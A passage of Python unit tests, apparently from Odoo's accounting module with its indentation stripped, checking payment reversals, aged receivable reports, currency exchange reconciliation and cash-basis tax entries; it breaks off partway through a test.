move = bank_line.move_id
# Reversing the payment's move
reversed_move_list = move.reverse_moves('2018-06-04')
self.assertEqual(len(reversed_move_list), 1)
reversed_move = self.env['account.move'].browse(reversed_move_list[0])
self.assertEqual(len(reversed_move.line_ids), 2)
# Testing the reconciliation matching between the move lines and their reversed counterparts
reversed_bank_line = reversed_move.line_ids.filtered(lambda l: l.account_id.id == self.bank_journal_usd.default_debit_account_id.id)
reversed_customer_line = reversed_move.line_ids - reversed_bank_line
self.assertEqual(len(reversed_bank_line), 1)
self.assertEqual(len(reversed_customer_line), 1)
self.assertNotEqual(reversed_bank_line.id, reversed_customer_line.id)
self.assertEqual(reversed_bank_line.move_id.id, reversed_customer_line.move_id.id)
self.assertEqual(reversed_bank_line.full_reconcile_id.id, bank_line.full_reconcile_id.id)
self.assertEqual(reversed_customer_line.full_reconcile_id.id, customer_line.full_reconcile_id.id)
def test_aged_report(self):
AgedReport = self.env['report.account.report_agedpartnerbalance'].with_context(include_nullified_amount=True)
account_type = ['receivable']
report_date_to = time.strftime('%Y') + '-07-17'
partner = self.env['res.partner'].create({'name': 'AgedPartner'})
currency = self.env.user.company_id.currency_id
invoice = self.create_invoice_partner(currency_id=currency.id, partner_id=partner.id)
journal = self.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'THE'})
statement = self.make_payment(invoice, journal, 50)
# The report searches on the create_date to dispatch reconciled lines to report periods
# Also, in this case, there can be only 1 partial_reconcile
statement_partial_id = statement.move_line_ids.mapped(lambda l: l.matched_credit_ids + l.matched_debit_ids)
self.env.cr.execute('UPDATE account_partial_reconcile SET create_date = %(date)s WHERE id = %(partial_id)s',
{'date': report_date_to + ' 00:00:00',
'partial_id': statement_partial_id.id})
# Case 1: The invoice and payment are reconciled: Nothing should appear
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [], 'The aged receivable shouldn\'t have lines at this point')
self.assertFalse(amls.get(partner.id, False), 'The aged receivable should not have amls either')
# Case 2: The invoice and payment are not reconciled: we should have one line on the report
# and 2 amls
invoice.move_id.line_ids.with_context(invoice_id=invoice.id).remove_move_reconcile()
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [{'trust': 'normal', '1': 0.0, '0': 0.0, 'direction': 0.0, 'partner_id': partner.id, '3': 0.0, 'total': 0.0, 'name': 'AgedPartner', '4': 0.0, '2': 0.0}],
'We should have a line in the report for the partner')
self.assertEqual(len(amls[partner.id]), 2, 'We should have 2 account move lines for the partner')
positive_line = [line for line in amls[partner.id] if line['line'].balance > 0]
negative_line = [line for line in amls[partner.id] if line['line'].balance < 0]
self.assertEqual(positive_line[0]['amount'], 50.0, 'The amount of the amls should be 50')
self.assertEqual(negative_line[0]['amount'], -50.0, 'The amount of the amls should be -50')
def test_revert_payment_and_reconcile_exchange(self):
# A reversal of a reconciled payment which created a currency exchange entry, should create reversal moves
# which move lines should be reconciled two by two with the original move's lines
def _determine_debit_credit_line(move):
line_ids_reconciliable = move.line_ids.filtered(lambda l: l.account_id.reconcile or l.account_id.internal_type == 'liquidity')
return line_ids_reconciliable.filtered(lambda l: l.debit), line_ids_reconciliable.filtered(lambda l: l.credit)
def _move_revert_test_pair(move, revert):
self.assertTrue(move.line_ids)
self.assertTrue(revert.line_ids)
move_lines = _determine_debit_credit_line(move)
revert_lines = _determine_debit_credit_line(revert)
# in the case of the exchange entry, only one pair of lines will be found
if move_lines[0] and revert_lines[1]:
self.assertTrue(move_lines[0].full_reconcile_id.exists())
self.assertEqual(move_lines[0].full_reconcile_id.id, revert_lines[1].full_reconcile_id.id)
if move_lines[1] and revert_lines[0]:
self.assertTrue(move_lines[1].full_reconcile_id.exists())
self.assertEqual(move_lines[1].full_reconcile_id.id, revert_lines[0].full_reconcile_id.id)
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.0,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-08-01',
'rate': 0.5,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
inv = self.create_invoice(invoice_amount=111, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 111,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_usd.id,
'payment_date': time.strftime('%Y') + '-08-01',
})
payment.post()
credit_aml = payment.move_line_ids.filtered('credit')
inv.assign_outstanding_credit(credit_aml.id)
self.assertTrue(inv.state == 'paid', 'The invoice should be paid')
exchange_reconcile = payment.move_line_ids.mapped('full_reconcile_id')
exchange_move = exchange_reconcile.exchange_move_id
payment_move = payment.move_line_ids[0].move_id
reverted_payment_move = self.env['account.move'].browse(payment_move.reverse_moves(time.strftime('%Y') + '-08-01'))
# After reversal of payment, the invoice should be open
self.assertTrue(inv.state == 'open', 'The invoice should be open again')
self.assertFalse(exchange_reconcile.exists())
reverted_exchange_move = self.env['account.move'].search([('journal_id', '=', exchange_move.journal_id.id), ('ref', 'ilike', exchange_move.name)], limit=1)
_move_revert_test_pair(payment_move, reverted_payment_move)
_move_revert_test_pair(exchange_move, reverted_exchange_move)
def test_aged_report_future_payment(self):
AgedReport = self.env['report.account.report_agedpartnerbalance'].with_context(include_nullified_amount=True)
account_type = ['receivable']
partner = self.env['res.partner'].create({'name': 'AgedPartner'})
currency = self.env.user.company_id.currency_id
invoice = self.create_invoice_partner(currency_id=currency.id, partner_id=partner.id)
journal = self.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'THE'})
statement = self.make_payment(invoice, journal, 50)
# Force the payment recording to take place on the invoice date
# Although the payment due_date is in the future relative to the invoice
# Also, in this case, there can be only 1 partial_reconcile
statement_partial_id = statement.move_line_ids.mapped(lambda l: l.matched_credit_ids + l.matched_debit_ids)
self.env.cr.execute('UPDATE account_partial_reconcile SET create_date = %(date)s WHERE id = %(partial_id)s',
{'date': invoice.date_invoice,
'partial_id': statement_partial_id.id})
# Case 1: report date is invoice date
# There should be an entry for the partner
report_date_to = invoice.date_invoice
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [{
'name': 'AgedPartner',
'trust': 'normal',
'partner_id': partner.id,
'0': 0.0,
'1': 0.0,
'2': 0.0,
'3': 0.0,
'4': 0.0,
'total': 50.0,
'direction': 50.0,
}], 'We should have a line in the report for the partner')
self.assertEqual(len(amls[partner.id]), 1, 'We should have 1 account move lines for the partner')
positive_line = [line for line in amls[partner.id] if line['line'].balance > 0]
self.assertEqual(positive_line[0]['amount'], 50.0, 'The amount of the amls should be 50')
# Case 2: report date between invoice date and payment date
# There should be an entry for the partner
# And the amount has shifted to '1-30 due'
report_date_to = time.strftime('%Y') + '-07-08'
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [{
'name': 'AgedPartner',
'trust': 'normal',
'partner_id': partner.id,
'0': 0.0,
'1': 0.0,
'2': 0.0,
'3': 0.0,
'4': 50.0,
'total': 50.0,
'direction': 0.0,
}], 'We should have a line in the report for the partner')
self.assertEqual(len(amls[partner.id]), 1, 'We should have 1 account move lines for the partner')
positive_line = [line for line in amls[partner.id] if line['line'].balance > 0]
self.assertEqual(positive_line[0]['amount'], 50.0, 'The amount of the amls should be 50')
# Case 2: report date on payment date
# There should not be an entry for the partner
report_date_to = time.strftime('%Y') + '-07-15'
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [], 'The aged receivable shouldn\'t have lines at this point')
self.assertFalse(amls.get(partner.id, False), 'The aged receivable should not have amls either')
def test_partial_reconcile_currencies_02(self):
####
# Day 1: Invoice Cust/001 to customer (expressed in USD)
# Market value of USD (day 1): 1 USD = 0.5 EUR
# * Dr. 100 USD / 50 EUR - Accounts receivable
# * Cr. 100 USD / 50 EUR - Revenue
####
account_revenue = self.env['account.account'].search(
[('user_type_id', '=', self.env.ref(
'account.data_account_type_revenue').id)], limit=1)
dest_journal_id = self.env['account.journal'].search(
[('type', '=', 'purchase'),
('company_id', '=', self.env.ref('base.main_company').id)],
limit=1)
# Delete any old rate - to make sure that we use the ones we need.
old_rates = self.env['res.currency.rate'].search(
[('currency_id', '=', self.currency_usd_id)])
old_rates.unlink()
self.env['res.currency.rate'].create({
'currency_id': self.currency_usd_id,
'name': time.strftime('%Y') + '-01-01',
'rate': 2,
})
invoice_cust_1 = self.account_invoice_model.create({
'partner_id': self.partner_agrolait_id,
'account_id': self.account_rcv.id,
'type': 'out_invoice',
'currency_id': self.currency_usd_id,
'date_invoice': time.strftime('%Y') + '-01-01',
})
self.account_invoice_line_model.create({
'quantity': 1.0,
'price_unit': 100.0,
'invoice_id': invoice_cust_1.id,
'name': 'product that cost 100',
'account_id': account_revenue.id,
})
invoice_cust_1.action_invoice_open()
self.assertEqual(invoice_cust_1.residual_company_signed, 50.0)
aml = invoice_cust_1.move_id.mapped('line_ids').filtered(
lambda x: x.account_id == account_revenue)
self.assertEqual(aml.credit, 50.0)
#####
# Day 2: Receive payment for half invoice Cust/1 (in USD)
# -------------------------------------------------------
# Market value of USD (day 2): 1 USD = 1 EUR
# Payment transaction:
# * Dr. 50 USD / 50 EUR - EUR Bank (valued at market price
# at the time of receiving the money)
# * Cr. 50 USD / 50 EUR - Accounts Receivable
#####
self.env['res.currency.rate'].create({
'currency_id': self.currency_usd_id,
'name': time.strftime('%Y') + '-01-02',
'rate': 1,
})
# register payment on invoice
payment = self.env['account.payment'].create(
{'payment_type': 'inbound',
'payment_method_id': self.env.ref(
'account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 50,
'currency_id': self.currency_usd_id,
'payment_date': time.strftime('%Y') + '-01-02',
'journal_id': dest_journal_id.id,
})
payment.post()
payment_move_line = False
for l in payment.move_line_ids:
if l.account_id == invoice_cust_1.account_id:
payment_move_line = l
invoice_cust_1.register_payment(payment_move_line)
# We expect at this point that the invoice should still be open,
# because they owe us still 50 CC.
self.assertEqual(invoice_cust_1.state, 'open',
'Invoice is in status %s' % invoice_cust_1.state)
def test_inv_refund_foreign_payment_writeoff_domestic(self):
company = self.env.ref('base.main_company')
self.env['res.currency.rate'].search([]).unlink()
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.0,
'currency_id': self.currency_euro_id,
'company_id': company.id
})
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.113900, # Don't change this !
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
inv1 = self.create_invoice(invoice_amount=480, currency_id=self.currency_usd_id)
inv2 = self.create_invoice(type="out_refund", invoice_amount=140, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_method_id': self.inbound_payment_method.id,
'payment_type': 'inbound',
'partner_type': 'customer',
'partner_id': inv1.partner_id.id,
'amount': 287.20,
'journal_id': self.bank_journal_euro.id,
'company_id': company.id,
})
payment.post()
inv1_receivable = inv1.move_id.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
inv2_receivable = inv2.move_id.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
pay_receivable = payment.move_line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
data_for_reconciliation = [
{
'type': 'partner',
'id': inv1.partner_id.id,
'mv_line_ids': (inv1_receivable + inv2_receivable + pay_receivable).ids,
'new_mv_line_dicts': [
{
'credit': 18.04,
'debit': 0.00,
'journal_id': self.bank_journal_euro.id,
'name': 'Total WriteOff (Fees)',
'account_id': self.diff_expense_account.id
}
]
}
]
self.env["account.reconciliation.widget"].process_move_lines(data_for_reconciliation)
self.assertTrue(inv1_receivable.full_reconcile_id.exists())
self.assertEquals(inv1_receivable.full_reconcile_id, inv2_receivable.full_reconcile_id)
self.assertEquals(inv1_receivable.full_reconcile_id, pay_receivable.full_reconcile_id)
self.assertTrue(inv1.reconciled)
self.assertTrue(inv2.reconciled)
self.assertEquals(inv1.state, 'paid')
self.assertEquals(inv2.state, 'paid')
def test_multiple_term_reconciliation_opw_1906665(self):
'''Test that when registering a payment to an invoice with multiple
payment term lines the reconciliation happens against the line
with the earliest date_maturity
'''
payment_term = self.env['account.payment.term'].create({
'name': 'Pay in 2 installments',
'line_ids': [
# Pay 50% immediately
(0, 0, {
'value': 'percent',
'value_amount': 50,
}),
# Pay the rest after 14 days
(0, 0, {
'value': 'balance',
'days': 14,
})
],
})
# can't use self.create_invoice because it validates and we need to set payment_term_id
invoice = self.account_invoice_model.create({
'partner_id': self.partner_agrolait_id,
'payment_term_id': payment_term.id,
'currency_id': self.currency_usd_id,
'name': 'Multiple payment terms',
'account_id': self.account_rcv.id,
'type': 'out_invoice',
'date_invoice': time.strftime('%Y') + '-07-01',
})
self.account_invoice_line_model.create({
'product_id': self.product.id,
'quantity': 1,
'price_unit': 50,
'invoice_id': invoice.id,
'name': self.product.display_name,
'account_id': self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_revenue').id)], limit=1).id,
})
invoice.action_invoice_open()
payment = self.env['account.payment'].create({
'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 25,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_usd.id,
})
payment.post()
invoice.assign_outstanding_credit(payment.move_line_ids.filtered('credit').id)
receivable_lines = invoice.move_id.line_ids.filtered(lambda line: line.account_id == self.account_rcv).sorted('date_maturity')[0]
self.assertTrue(receivable_lines.matched_credit_ids)
def test_reconciliation_cash_basis01(self):
# Simulates an expense made up by 2 lines
# one is subject to a cash basis tax
# the other is not subject to tax
company = self.env.ref('base.main_company')
company.tax_cash_basis_journal_id = self.cash_basis_journal
AccountMoveLine = self.env['account.move.line'].with_context(check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'purchase',
'journal_id': self.purchase_journal.id,
})
purchase_payable_line0 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 100,
'move_id': purchase_move.id,
})
purchase_payable_line1 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 50,
'move_id': purchase_move.id,
})
AccountMoveLine.create({
'name': 'expensNoTax',
'account_id': self.expense_account.id,
'debit': 50,
'move_id': purchase_move.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed',
'account_id': self.expense_account.id,
'debit': 83.33,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
})
tax_line = AccountMoveLine.create({
'name': 'TaxLine',
'account_id': self.tax_waiting_account.id,
'debit': 16.67,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
})
purchase_move.post()
# Payment Move
payment_move = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_euro.id,
})
payment_payable_line = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'debit': 150,
'move_id': payment_move.id,
})
AccountMoveLine.create({
'account_id': self.account_euro.id,
'credit': 150,
'move_id': payment_move.id,
})
payment_move.post()
to_reconcile = (purchase_move + payment_move).mapped('line_ids').filtered(lambda l: l.account_id.internal_type == 'payable')
to_reconcile.reconcile()
cash_basis_moves = self.env['account.move'].search([('journal_id', '=', self.cash_basis_journal.id)])
self.assertEqual(len(cash_basis_moves), 2)
self.assertTrue(cash_basis_moves.exists())
# check reconciliation in Payable account
self.assertTrue(purchase_payable_line0.full_reconcile_id.exists())
self.assertEqual(purchase_payable_line0.full_reconcile_id.reconciled_line_ids,
purchase_payable_line0 + purchase_payable_line1 + payment_payable_line)
cash_basis_aml_ids = cash_basis_moves.mapped('line_ids')
# check reconciliation in the tax waiting account
self.assertTrue(tax_line.full_reconcile_id.exists())
self.assertEqual(tax_line.full_reconcile_id.reconciled_line_ids,
cash_basis_aml_ids.filtered(lambda l: l.account_id == self.tax_waiting_account) + tax_line)
self.assertEqual(len(cash_basis_aml_ids), 8)
# check amounts
cash_basis_move1 = cash_basis_moves.filtered(lambda m: m.amount == 33.34)
cash_basis_move2 = cash_basis_moves.filtered(lambda m: m.amount == 66.66)
self.assertTrue(cash_basis_move1.exists())
self.assertTrue(cash_basis_move2.exists())
# For first move
move_lines = cash_basis_move1.line_ids
base_amount_tax_lines = move_lines.filtered(lambda l: l.account_id == self.tax_base_amount_account)
self.assertEqual(len(base_amount_tax_lines), 2)
self.assertAlmostEqual(sum(base_amount_tax_lines.mapped('credit')), 27.78)
self.assertAlmostEqual(sum(base_amount_tax_lines.mapped('debit')), 27.78)
self.assertAlmostEqual((move_lines - base_amount_tax_lines).filtered(lambda l: l.account_id == self.tax_waiting_account).credit,
5.56)
self.assertAlmostEqual((move_lines - base_amount_tax_lines).filtered(lambda l: l.account_id == self.tax_final_account).debit,
5.56)
# For second move
move_lines = cash_basis_move2.line_ids
base_amount_tax_lines = move_lines.filtered(lambda l: l.account_id == self.tax_base_amount_account)
self.assertEqual(len(base_amount_tax_lines), 2)
self.assertAlmostEqual(sum(base_amount_tax_lines.mapped('credit')), 55.55)
self.assertAlmostEqual(sum(base_amount_tax_lines.mapped('debit')), 55.55)
self.assertAlmostEqual((move_lines - base_amount_tax_lines).filtered(lambda l: l.account_id == self.tax_waiting_account).credit,
11.11)
self.assertAlmostEqual((move_lines - base_amount_tax_lines).filtered(lambda l: l.account_id == self.tax_final_account).debit,
11.11)
def test_reconciliation_cash_basis02(self):
# Simulates an invoice made up by 2 lines
# both subjected to cash basis taxes
# with 2 payment terms
# And partial payment not martching any payment term
company = self.env.ref('base.main_company')
company.tax_cash_basis_journal_id = self.cash_basis_journal
tax_cash_basis10percent = self.tax_cash_basis.copy({'amount': 10})
tax_waiting_account10 = self.tax_waiting_account.copy({
'name': '<NAME>',
'code': 'TWAIT1',
})
AccountMoveLine = self.env['account.move.line'].with_context(check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'invoice',
'journal_id': self.purchase_journal.id,
})
purchase_payable_line0 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 105,
'move_id': purchase_move.id,
})
purchase_payable_line1 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 50,
'move_id': purchase_move.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed 10%',
'account_id': self.expense_account.id,
'debit': 50,
'move_id': purchase_move.id,
'tax_ids': [(4, tax_cash_basis10percent.id, False)],
})
tax_line0 = AccountMoveLine.create({
'name': 'TaxLine0',
'account_id': tax_waiting_account10.id,
'debit': 5,
'move_id': purchase_move.id,
'tax_line_id': tax_cash_basis10percent.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed 20%',
'account_id': self.expense_account.id,
'debit': 83.33,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
})
tax_line1 = AccountMoveLine.create({
'name': 'TaxLine1',
'account_id': self.tax_waiting_account.id,
'debit': 16.67,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
})
purchase_move.post()
# Payment Move
payment_move0 = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_euro.id,
})
payment_payable_line0 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'debit': 40,
'move_id': payment_move0.id,
})
AccountMoveLine.create({
'account_id': self.account_euro.id,
'credit': 40,
'move_id': payment_move0.id,
})
payment_move0.post()
# Payment Move
payment_move1 = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_euro.id,
})
payment_payable_line1 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'debit': 115,
'move_id': payment_move1.id,
})
AccountMoveLine.create({
'account_id': self.account_euro.id,
'credit': 115,
'move_id': payment_move1.id,
})
payment_move1.post()
(purchase_move + payment_move0).mapped('line_ids').filtered(lambda l: l.account_id.internal_type == 'payable').reconcile()
(purchase_move + payment_move1).mapped('line_ids').filtered(lambda l: l.account_id.internal_type == 'payable').reconcile()
cash_basis_moves = self.env['account.move'].search([('journal_id', '=', self.cash_basis_journal.id)])
self.assertEqual(len(cash_basis_moves), 3)
self.assertTrue(cash_basis_moves.exists())
# check reconciliation in Payable account
self.assertTrue(purchase_payable_line0.full_reconcile_id.exists())
self.assertEqual(purchase_payable_line0.full_reconcile_id.reconciled_line_ids,
purchase_payable_line0 + purchase_payable_line1 + payment_payable_line0 + payment_payable_line1)
cash_basis_aml_ids = cash_basis_moves.mapped('line_ids')
# check reconciliation in the tax waiting account
self.assertTrue(tax_line0.full_reconcile_id.exists())
self.assertEqual(tax_line0.full_reconcile_id.reconciled_line_ids,
cash_basis_aml_ids.filtered(lambda l: l.account_id == tax_waiting_account10) + tax_line0)
self.assertTrue(tax_line1.full_reconcile_id.exists())
self.assertEqual(tax_line1.full_reconcile_id.reconciled_line_ids,
cash_basis_aml_ids.filtered(lambda l: l.account_id == self.tax_waiting_account) + tax_line1)
self.assertEqual(len(cash_basis_aml_ids), 24)
# check amounts
expected_move_amounts = [
{'base_20': 56.45, 'tax_20': 11.29, 'base_10': 33.87, 'tax_10': 3.39},
{'base_20': 21.50, 'tax_20': 4.30, 'base_10': 12.90, 'tax_10': 1.29},
{'base_20': 5.38, 'tax_20': 1.08, 'base_10': 3.23, 'tax_10': 0.32},
]
index = 0
for cb_move in cash_basis_moves.sorted('amount', reverse=True):
expected = expected_move_amounts[index]
move_lines = cb_move.line_ids
base_amount_tax_lines20per = move_lines.filtered(lambda l: l.account_id == self.tax_base_amount_account and '20%' in l.name)
base_amount_tax_lines10per = move_lines.filtered(lambda l: l.account_id == self.tax_base_amount_account and '10%' in l.name)
self.assertEqual(len(base_amount_tax_lines20per), 2)
self.assertAlmostEqual(sum(base_amount_tax_lines20per.mapped('credit')), expected['base_20'])
self.assertAlmostEqual(sum(base_amount_tax_lines20per.mapped('debit')), expected['base_20'])
self.assertEqual(len(base_amount_tax_lines10per), 2)
self.assertAlmostEqual(sum(base_amount_tax_lines10per.mapped('credit')), expected['base_10'])
self.assertAlmostEqual(sum(base_amount_tax_lines10per.mapped('debit')), expected['base_10'])
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines20per - base_amount_tax_lines10per)
.filtered(lambda l: l.account_id == self.tax_waiting_account).credit,
expected['tax_20']
)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines20per - base_amount_tax_lines10per)
.filtered(lambda l: 'TaxLine1' in l.name).debit,
expected['tax_20']
)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines20per - base_amount_tax_lines10per)
.filtered(lambda l: l.account_id == tax_waiting_account10).credit,
expected['tax_10']
)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines20per - base_amount_tax_lines10per)
.filtered(lambda l: 'TaxLine0' in l.name).debit,
expected['tax_10']
)
index += 1
def test_reconciliation_cash_basis_fx_01(self):
"""
Company's Currency EUR
Having issued an invoice at date Nov-21-2018 as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Expenses 5,301.00 USD 106,841.65 0.00
Taxes 848.16 USD 17,094.66 0.00
Payables -6,149.16 USD 0.00 123,936.31
On Dec-20-2018 user issues an FX Journal Entry as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Payables 0.00 USD 167.86 0.00
FX Gains 0.00 USD 0.00 167.86
On Same day user records a payment for:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Payables 6,149.16 USD 123,768.45 0.00
Bank -6,149.16 USD 0.00 123,768.45
And then reconciles the Payables Items which shall render only one Tax
Cash Basis Journal Entry because of the actual payment, i.e.
amount_currency != 0:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Tax Base Acc. 0.00 USD 106,841.65 0.00
Tax Base Acc. 0.00 USD 0.00 106,841.65
Creditable Taxes 848.16 USD 17,094.66 0.00
Taxes -848.16 USD 0.00 17,094.66
"""
company = self.env.ref('base.main_company')
company.country_id = self.ref('base.us')
company.tax_cash_basis_journal_id = self.cash_basis_journal
aml_obj = self.env['account.move.line'].with_context(
check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'purchase',
'journal_id': self.purchase_journal.id,
})
aml_obj.create({
'name': 'expenseTaxed',
'account_id': self.expense_account.id,
'debit': 106841.65,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
'currency_id': self.currency_usd_id,
'amount_currency': 5301.00,
})
aml_obj.create({
'name': 'TaxLine',
'account_id': self.tax_waiting_account.id,
'debit': 17094.66,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
'currency_id': self.currency_usd_id,
'amount_currency': 848.16,
})
purchase_payable_line0 = aml_obj.create({
'name': 'Payable',
'account_id': self.account_rsa.id,
'credit': 123936.31,
'move_id': purchase_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': -6149.16,
})
purchase_move.post()
# FX 01 Move
fx_move_01 = self.env['account.move'].create({
'name': 'FX 01',
'journal_id': self.fx_journal.id,
})
fx_01_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'debit': 167.86,
'move_id': fx_move_01.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
aml_obj.create({
'account_id': self.diff_income_account.id,
'credit': 167.86,
'move_id': fx_move_01.id,
'currency_id': self.currency_usd_id,
'amount_currency': 0.00,
})
fx_move_01.post()
# Payment Move
payment_move = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_usd.id,
})
payment_payable_line = aml_obj.create({
'account_id': self.account_rsa.id,
'debit': 123768.45,
'move_id': payment_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': 6149.16,
})
aml_obj.create({
'account_id': self.account_usd.id,
'credit': 123768.45,
'move_id': payment_move.id,
'currency_id': self.currency_usd_id,
'amount_currency': -6149.16,
})
payment_move.post()
to_reconcile = (
(purchase_move + payment_move + fx_move_01).mapped('line_ids')
.filtered(lambda l: l.account_id.internal_type == 'payable'))
to_reconcile.reconcile()
# check reconciliation in Payable account
self.assertTrue(purchase_payable_line0.full_reconcile_id.exists())
self.assertEqual(
purchase_payable_line0.full_reconcile_id.reconciled_line_ids,
purchase_payable_line0 + fx_01_payable_line + payment_payable_line)
# check cash basis
cash_basis_moves = self.env['account.move'].search(
[('journal_id', '=', self.cash_basis_journal.id)])
self.assertEqual(len(cash_basis_moves), 1)
cash_basis_aml_ids = cash_basis_moves.mapped('line_ids')
self.assertEqual(len(cash_basis_aml_ids), 4)
# check amounts
cash_basis_move1 = cash_basis_moves.filtered(
lambda m: m.amount == 123936.31)
self.assertTrue(cash_basis_move1.exists())
# For first move
move_lines = cash_basis_move1.line_ids
base_amount_tax_lines = move_lines.filtered(
lambda l: l.account_id == self.tax_base_amount_account)
self.assertEqual(len(base_amount_tax_lines), 2)
self.assertAlmostEqual(
sum(base_amount_tax_lines.mapped('credit')), 106841.65)
self.assertAlmostEqual(
sum(base_amount_tax_lines.mapped('debit')), 106841.65)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines)
.filtered(lambda l: l.account_id == self.tax_waiting_account)
.credit, 17094.66)
self.assertAlmostEqual(
(move_lines - base_amount_tax_lines)
.filtered(lambda l: l.account_id == self.tax_final_account)
.debit, 17094.66)
def test_reconciliation_cash_basis_fx_02(self):
"""
Company's Currency EUR
Having issued an invoice at date Nov-21-2018 as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Expenses 5,301.00 USD 106,841.65 0.00
Taxes 848.16 USD 17,094.66 0.00
Payables -6,149.16 USD 0.00 123,936.31
On Nov-30-2018 user issues an FX Journal Entry as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
FX Losses 0.00 USD 1.572.96 0.00
Payables 0.00 USD 0.00 1.572.96
On Dec-20-2018 user issues an FX Journal Entry as:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Payables 0.00 USD 1.740.82 0.00
FX Gains 0.00 USD 0.00 1.740.82
On Same day user records a payment for:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Payables 6,149.16 USD 123,768.45 0.00
Bank -6,149.16 USD 0.00 123,768.45
And then reconciles the Payables Items which shall render only one Tax
Cash Basis Journal Entry because of the actual payment, i.e.
amount_currency != 0:
Accounts Amount Currency Debit(EUR) Credit(EUR)
---------------------------------------------------------------------
Tax Base Acc. 0.00 USD 106,841.65 0.00
Tax Base Acc. 0.00 USD 0.00 106,841.65
Creditable Taxes 848.16 USD 17,094.66 0.00
Taxes -848.16 USD 0.00 17,094.66
"""
company = self.env.ref('base.main_company')
company.country_id = self.ref('base.us')
company.tax_cash_basis_journal_id = self.cash_basis_journal
aml_obj = self.env['account.move.line'].with_context(
check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'purchase',
'journal_id': self.purchase_journal.id,
})
aml_obj.create({
'name': 'expenseTaxed',
'account_id': self.expense_account.id,
'debit': 106841.65,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
'currency_id': self.currency_usd_id,
